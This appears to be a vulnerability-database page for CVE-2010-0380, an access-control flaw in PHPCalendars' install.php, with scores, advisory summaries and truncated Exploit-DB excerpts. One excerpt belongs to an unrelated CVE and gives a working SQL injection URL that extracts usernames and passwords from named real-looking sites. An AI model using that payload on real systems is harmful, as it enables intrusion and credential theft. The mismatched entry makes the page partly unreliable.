CVE-2010-0380
published 2010-01-22CVE-2010-0380: install.php in JCE-Tech PHP Calendars, downloaded 20100121, allows remote attackers to bypass intended access restrictions and modify application settings via…
PriorityP430medium5CVSS 2.0
AVNACLAuNCNIPAN
EXPLOIT
EPSS
1.95%
77.8th percentile
install.php in JCE-Tech PHP Calendars, downloaded 20100121, allows remote attackers to bypass intended access restrictions and modify application settings via a direct request. NOTE: this is only a vulnerability when the administrator does not follow recommendations in the product's installation documentation.
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
VulDB
JCE-Tech Php Calendars Script Access Restriction install.php cat access control (EDB-11082 / OSVDB-61617)
vuldb·2026-04-29·CVSS 5.0
CVE-2010-0380 [MEDIUM] JCE-Tech Php Calendars Script Access Restriction install.php cat access control (EDB-11082 / OSVDB-61617)
A vulnerability identified as critical has been detected in JCE-Tech Php Calendars Script. Affected is an unknown function of the file install.php of the component Access Restriction. This manipulation of the argument cat causes improper access controls.
This vulnerability is registered as CVE-2010-0380. Remote exploitation of the attack is possible. Furthermore, an exploit is available.
GHSA
GHSA-g82f-w5wm-qcw6: install
ghsa_unreviewed·2022-05-02
CVE-2010-0380 [MEDIUM] GHSA-g82f-w5wm-qcw6: install
install.php in JCE-Tech PHP Calendars, downloaded 20100121, allows remote attackers to bypass intended access restrictions and modify application settings via a direct request. NOTE: this is only a vulnerability when the administrator does not follow recommendations in the product's installation documentation.
No detection rules found.
Exploit-DB
PHPCalendars - Multiple Vulnerabilities
exploitdb·2010-01-10
CVE-2010-0380 PHPCalendars - Multiple Vulnerabilities
PHPCalendars - Multiple Vulnerabilities
---
_ _ _ _ _ _
/ \ | | | | / \ | | | |
/ _ \ | | | | / _ \ | |_| |
/ ___ \ | |___ | |___ / ___ \ | _ |
/_/ \_\ |_____| |_____| /_/ \_\ |_| |_|
[»] ~ Note : Forever RevengeHack.Com-Ar-Ge.Org Acildi
[»] PHPCalendars Multi Vulnerability
[»] Script: [ PHPCalendars ]
[»] Language: [ PHP ]
[»] Download: [ http://scripti.org/script_calendarstore-alisveris-scripti_1256_21.html]
[»] Founder: [ LionTurk - [email protected] & LionTurk.Turkblog.com }
[»] My Home: [ RevengeHack.com and Ar-ge.Org ]
[»]N0T3 : Yeni Aciklarimi Bekleyin.
###########################################################################
===[ Exploit And Dork ]===
[»] http://server/[dizin]/product_list.php?cat=1[XSS-Vuln]
[»] http://server/[dizin]/install.p
Exploit-DB
Mambo Component SOBI2 RC 2.8.2 - SQL Injection
exploitdb·2009-01-21
CVE-2009-0380 Mambo Component SOBI2 RC 2.8.2 - SQL Injection
Mambo Component SOBI2 RC 2.8.2 - SQL Injection
---
|| || | ||
o_,_7 _|| . _o_7 _|| 4_|_|| o_w_,
( : / (_) / ( .
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+
| |
| GaZa WiLL NeVeR DiE |
| |
| |
| Proud To Be A MusLiM , Proud To Be A EgYpTiaN |
| |
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+
> Found by : Br1ght D@rk
> C0ntact : MiDo2005_2010 [at] hotmail.com
> Groups : EgY C0D3RS TeaM , SeCuRiTy G33KS
+++++++++++++++++++++++ Exploit +++++++++++++++++++++++
> D0rk : find it
> Exploit :>>>
:>>> http://www.site.co.il/index.php?option=com_sobi2&task=showbiz&bid=-78+union+select+0,concat(username,0x3a3a,password),0+from+jos_users--
> DeM00 :>>> http://www.karmel.co.il/index.php?option=com_sobi2&task=showbiz&bid=-78+union+select+1,concat(username,0x
No writeups or analysis indexed.
2010-01-22
Published